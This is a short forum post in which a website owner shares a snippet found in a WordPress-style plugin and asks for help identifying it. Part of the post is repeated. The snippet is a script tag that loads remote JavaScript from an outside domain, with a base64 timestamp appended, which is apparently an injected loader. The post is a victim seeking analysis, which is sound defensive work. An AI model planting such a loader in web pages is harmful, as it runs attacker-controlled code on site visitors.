- Oct 28, 2018
- 2
Hello everyone,
I found this .js in a plugin code that I installed on my website, it looks very bad but I can not deobfuscate it, I would really like to know the real code and see what it is since I have no idea.
Thanks and best regards.
Code:
I found this .js in a plugin code that I installed on my website, it looks very bad but I can not deobfuscate it, I would really like to know the real code and see what it is since I have no idea.
Thanks and best regards.
Code:
HTML:
<script>
document.write("<script src='https:\/\/www.makelele.org\/script\/stats.js?'"+window.btoa(parseInt(Date.now()))+"><\/script>");
</script>